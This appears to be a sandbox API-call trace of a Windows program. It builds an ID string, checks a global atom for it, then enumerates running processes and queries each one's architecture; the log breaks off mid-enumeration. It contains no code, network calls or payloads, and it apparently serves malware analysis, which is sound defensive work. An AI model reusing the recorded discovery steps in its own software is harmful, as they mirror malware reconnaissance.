	[0075.113] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.113] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0075.113] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0075.113] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.114] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.115] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.116] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.117] GetLastError () returned 0x5
	[0075.118] GetLastError () returned 0x5
	[0075.118] GetLastError () returned 0x5
	[0075.118] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.118] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0075.118] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.119] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0075.119] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0075.119] CloseHandle (hObject=0x224) returned 1
	[0075.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0075.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0075.120] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.120] CloseHandle (hObject=0x224) returned 1
	[0075.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0075.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0075.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0075.121] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.121] CloseHandle (hObject=0x224) returned 1
	[0075.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16cc8) returned 0xc0000004
	[0075.155] VirtualAlloc (lpAddress=0x0, dwSize=0x16dc8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0075.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16dc8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0075.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0075.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772170, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0075.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0075.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0075.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0075.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0075.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0075.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0075.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0075.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0075.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0075.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0075.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0075.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0075.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0075.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0075.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0075.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0075.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0075.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0075.164] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.164] CloseHandle (hObject=0x224) returned 1
	[0075.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0075.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0075.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728878, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0075.165] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.165] CloseHandle (hObject=0x224) returned 1
	[0075.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728958, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0075.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0075.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0075.166] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.166] CloseHandle (hObject=0x224) returned 1
	[0075.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0075.166] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.166] CloseHandle (hObject=0x224) returned 1
	[0075.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0075.167] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.167] CloseHandle (hObject=0x224) returned 1
	[0075.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0075.167] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.167] CloseHandle (hObject=0x224) returned 1
	[0075.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728978, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0075.168] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.168] CloseHandle (hObject=0x224) returned 1
	[0075.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0075.168] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.168] CloseHandle (hObject=0x224) returned 1
	[0075.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0075.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0075.169] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.169] CloseHandle (hObject=0x224) returned 1
	[0075.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0075.169] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.169] CloseHandle (hObject=0x224) returned 1
	[0075.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0075.170] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.170] CloseHandle (hObject=0x224) returned 1
	[0075.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7289b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0075.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0075.170] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.170] CloseHandle (hObject=0x224) returned 1
	[0075.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728858, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0075.170] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.170] CloseHandle (hObject=0x224) returned 1
	[0075.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dcb0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0075.171] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.171] CloseHandle (hObject=0x224) returned 1
	[0075.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728958, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0075.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0075.171] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.171] CloseHandle (hObject=0x224) returned 1
	[0075.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72eb08, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0075.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0075.172] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.172] CloseHandle (hObject=0x224) returned 1
	[0075.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0075.172] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.172] CloseHandle (hObject=0x224) returned 1
	[0075.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0075.173] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.173] CloseHandle (hObject=0x224) returned 1
	[0075.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0075.173] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.173] CloseHandle (hObject=0x224) returned 1
	[0075.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
